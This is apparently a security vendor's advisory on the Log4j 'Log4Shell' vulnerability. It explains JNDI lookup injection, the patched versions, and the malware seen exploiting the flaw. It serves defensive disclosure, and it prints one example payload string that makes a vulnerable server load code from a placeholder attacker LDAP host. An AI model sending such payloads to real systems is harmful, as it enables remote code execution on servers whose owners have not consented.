Patch Now Apache Log4j Vulnerability Called Log4Shell Actively Exploited
A vulnerability in Apache Log4j, a widely used logging package for Java has been found. The vulnerability, which can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell. It was first reported privately to Apache on November 24 and was patched with version 2.15.0 of Log4j on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter. Since then, it has been disclosed that in certain non-default conditions, the original patch was incomplete; this was designated as CVE-2021-45046 and a new version of Log4j, 2.16.0, has been released.
We have developed a Log4j vulnerability tester, a web-based tool that can help identify vulnerable server applications. We’ve compiled a list of our products that can help with protection and detection on our support page as well as information pertaining to our own products being vulnerable or not.
Whenever ${some_expression} can be found, Java lookup mechanisms find the value of expression and replaces it. Some of the lookups supported by Log4j are jndi, sys, env, java, lower, and upper. JNDI lookup supports protocols such as LDAP, RMI, DNS, and IIOP. As we discuss in the following, an attacker could inject JNDI expressions in logs.
For example, an attacker can do this via HTTP requests to a web server; notably, this is the most common attack vector that we have seen currently. The lookup method will then download and execute malicious.class placed in an attacker-controlled LDAP server. In its most basic form, all the attacker has to do is to plant the following expression in the logs:
${jndi:ldap://{malicious website}/a}
This will then run the malicious Java code located at http://{malicious website}/{malicious.class}.
Attacks in the wild
We have observed threat actors dropping Mirai variants and Kinsing coinminers onto vulnerable servers. While some of the network traffic is simple, other threat actors are using obfuscation in the expression to hide their traffic. Examples of these can be found at the end of this entry.
Ransomware operators were also reportedly exploiting Log4Shell, particularly those behind the Khonsari ransomware family. We detect the Khonsari ransomware payload as Ransom.MSIL.KHONSARI.YXBLN.
Infection chain
Here is a possible infection flow from attacks that might exploit Log4Shell: